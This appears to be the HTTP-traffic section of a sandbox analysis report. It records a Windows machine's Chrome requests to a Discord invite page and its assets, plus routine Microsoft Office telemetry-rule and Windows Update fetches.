                          Source: global trafficHTTP traffic detected: GET /assets/0e5029fd9cd4812b6712.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                          Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /assets/55ad931ed92a15c15709.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/52015caea7357a7a60a9.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /api/v9/auth/location-metadata HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Super-Properties: eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTE3LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjM0NzY5MSwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=X-Fingerprint: 1309974925423153294.42Ce08a9wThnlRToTnNlmvvLUxIX-Debug-Options: bugReporterEnabledsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-Discord-Timezone: America/New_YorkX-Discord-Locale: en-USsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                          Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /icons/1250434927087058944/06f5aa2f0dfc1da41888860135dc216c.webp?size=64 HTTP/1.1Host: cdn.discordapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /assets/1222195a37d6dd10994e.woff2 HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://discord.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://discord.com/assets/69646.32a83a0c7e0a41f066e8.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                          Source: global trafficHTTP traffic detected: GET /assets/c1b53be672aac192a996.woff2 HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://discord.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://discord.com/assets/69646.32a83a0c7e0a41f066e8.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                          Source: global trafficHTTP traffic detected: GET /assets/ecff74bf4394e6e58dd1.woff2 HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://discord.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://discord.com/assets/69646.32a83a0c7e0a41f066e8.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                          Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /assets/favicon.ico HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                          Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=CP4fkenoRh1CF+c&MD=1vLSVSte HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                          Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /api/v9/invites/BNXa5rYFXM?with_counts=true&with_expiration=true HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/0e5029fd9cd4812b6712.svg HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/b9995525a52dc58aecf5.svg HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /api/v9/auth/location-metadata HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /assets/favicon.ico HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /icons/1250434927087058944/06f5aa2f0dfc1da41888860135dc216c.webp?size=64 HTTP/1.1Host: cdn.discordapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=KAcGVNtPMCv7sWfjg360aENPGJheHXQ0HjOPPxDuHfM-1732392781-1.0.1.1-zISFDyN7FJWkh0DA.gwqkNDlURQZsmKWjNBZ8AirPjlDdoXQmKbfEbZbGtPEVyDR1tfagnz4KDHXthNQegf2yg; _cfuvid=oPRVtPwKSsZTopsBC0idJWRUtVJMSOKN_1YRGfg1h1U-1732392781371-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
